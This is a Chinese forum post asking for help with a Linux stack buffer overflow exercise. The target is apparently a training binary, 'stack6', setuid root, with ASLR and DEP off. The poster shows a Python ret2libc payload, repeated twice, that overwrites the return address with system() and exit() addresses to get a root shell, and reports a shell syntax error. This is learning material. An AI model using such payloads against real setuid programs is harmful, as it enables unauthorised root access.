-
-
[旧帖] linux下一个简单的缓冲区溢出实验遇到的问题 0.00雪花
-
发表于: 2016-6-7 14:01
-
rt,最近在做linux下的缓冲区溢出试验(ASLR和DEP已经关闭), 写了一个简单的payload:
#!/usr/bin/env python3
#
offset = 80
command = "/bin/sh;#"
filler = "A"*(offset - len(command))
system_addr= "\xb0\xff\xec\xb7" #addr of system
system_arg = "\x2c\xf7\xff\xbf" # addr of start of buffer
exit_addr = "\xc0\x60\xec\xb7" #addr of exit
exit_arg = "\xff\xff\xff\xff"
print(command + filler + system_addr + exit_addr + system_arg + exit_arg)
最终执行(cat pwn6; cat) | ~/stack6, 把上面的payload传入stack6这个程序,造成栈缓冲区溢出, 并覆盖返回地址跳转到system函数;
stack6是一个设置了setuid且所属用户为root的程序;
这里期望得到一个root权限的shell, 但是程序确报了这样的错误:
sh: Syntax error: word unexpected (expecting ")")
求各位大牛指点
#!/usr/bin/env python3
#
offset = 80
command = "/bin/sh;#"
filler = "A"*(offset - len(command))
system_addr= "\xb0\xff\xec\xb7" #addr of system
system_arg = "\x2c\xf7\xff\xbf" # addr of start of buffer
exit_addr = "\xc0\x60\xec\xb7" #addr of exit
exit_arg = "\xff\xff\xff\xff"
print(command + filler + system_addr + exit_addr + system_arg + exit_arg)
最终执行(cat pwn6; cat) | ~/stack6, 把上面的payload传入stack6这个程序,造成栈缓冲区溢出, 并覆盖返回地址跳转到system函数;
stack6是一个设置了setuid且所属用户为root的程序;
这里期望得到一个root权限的shell, 但是程序确报了这样的错误:
sh: Syntax error: word unexpected (expecting ")")
求各位大牛指点
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
|
|
|---|---|
